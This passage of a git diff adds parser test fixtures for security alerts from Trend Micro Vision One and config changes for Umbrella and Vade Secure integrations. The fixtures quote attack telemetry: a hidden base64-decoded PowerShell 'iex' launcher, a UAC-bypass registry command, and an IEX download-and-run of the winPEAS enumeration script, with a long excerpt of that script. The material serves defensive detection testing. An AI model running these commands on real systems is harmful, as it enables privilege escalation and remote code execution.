"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; " + } + }, + "registry": { + "data": { + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x", + "type": "REG_SZ" + }, + "hive": "hkcr", + "key": "ms-settings\\shell\\open\\command", + "path": "hkcr\\ms-settings\\shell\\open\\command\\hkcr\\ms-settings\\shell\\open\\command\\delegateexecute", + "value": "delegateexecute" + }, + "related": { + "ip": [ + "10.10.58.51" + ], + "user": [ + "sam" + ] + }, + "rule": { + "name": "Privilege Escalation via UAC Bypass" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00022", + "case_id": "CL-1-20230706-00001", + "incident_id": "IC-1-20230706-00001", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "domain": "shockwave", + "email": "support@pctutordetroit.com", + "id": "shockwave\\sam", + "name": "sam" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json new file mode 100644 index 000000000..a9a7d3d7c --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json @@ -0,0 +1,75 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n }\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n }\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Possible Web Service Abuse", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:45:28Z", + "action": { + "properties": { + "ScriptBlockText": "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" + } + }, + "host": { + "id": "e930412e-e09c-454b-a508-576ba266b9d8", + "ip": [ + "20.193.45.33" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha256": "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + ], + "ip": [ + "20.193.45.33" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Possible Web Service Abuse" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Umbrella/umbrella-proxy/ingest/parser.yml b/Umbrella/umbrella-proxy/ingest/parser.yml index 790c57048..442c5da45 100644 --- a/Umbrella/umbrella-proxy/ingest/parser.yml +++ b/Umbrella/umbrella-proxy/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "event.message.http_request_url" output_field: message pattern: "(%{URIPROTO:url_scheme}://)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index 1e4a81657..45923af39 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,6 +58,22 @@ vadesecure.attachments: short: vadesecure.to_header type: array +vadesecure.auth_results_details.dkim: + description: The result of the DomainKeys Identified Mail (DKIM) + name: vadesecure.auth_results_details.dkim + type: keyword + +vadesecure.auth_results_details.dmarc: + description: Result of the Domand-based Message Authentication Reporting and Conformance + (DMARC) + name: vadesecure.auth_results_details.dmarc + type: keyword + +vadesecure.auth_results_details.spf: + description: The result of the Sender Policy Framework (SPF) + name: vadesecure.auth_results_details.spf + type: keyword + vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. name: vadesecure.campaign.actions diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml index 8c6e799a6..49acafa59 100644 --- a/VadeSecure/vade_secure_m365/_meta/manifest.yml +++ b/VadeSecure/vade_secure_m365/_meta/manifest.yml @@ -1,6 +1,8 @@ uuid: e4a758fc-7620-49e6-b8ed-b7fb3d7fa232 name: Vade for M365 slug: vade-m365 +automation_connector_uuid: d3860745-4433-4690-b025-378369ad7201 +automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff description: >- Vade for M365 offers all protections from Vade to our Microsoft 365 Email service data_sources: diff --git a/VadeSecure/vade_secure_m365/ingest/parser.yml b/VadeSecure/vade_secure_m365/ingest/parser.yml index 539de1df4..cbac9cd2d 100644 --- a/VadeSecure/vade_secure_m365/ingest/parser.yml +++ b/VadeSecure/vade_secure_m365/ingest/parser.yml @@ -56,6 +56,7 @@ stages: actions: - name: set set: + vadesecure.auth_results_details: "{{parse_json.message.auth_results_details}}" vadesecure.folder: "{{parse_json.message.folder}}" vadesecure.from_header: "{{parse_json.message.from_header}}" vadesecure.to_header: "{{parse_json.message.to_header}}" @@ -131,3 +132,7 @@ stages: - set: source.ip: "{{parse_json.message.sender_ip}}" filter: "{{parse_json.message.sender_ip| is_ipaddress}}" + + - set: + email.reply_to.address: "{{parse_json.message.reply_to_header}}" + filter: "{{parse_json.message.reply_to_header != ''}}" diff --git a/VadeSecure/vade_secure_m365/tests/email_02.json b/VadeSecure/vade_secure_m365/tests/email_02.json new file mode 100644 index 000000000..7b2c0ae83 --- /dev/null +++ b/VadeSecure/vade_secure_m365/tests/email_02.json @@ -0,0 +1,61 @@ +{ + "input": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [], + "from": { + "address": "jd@doe.fr" + }, + 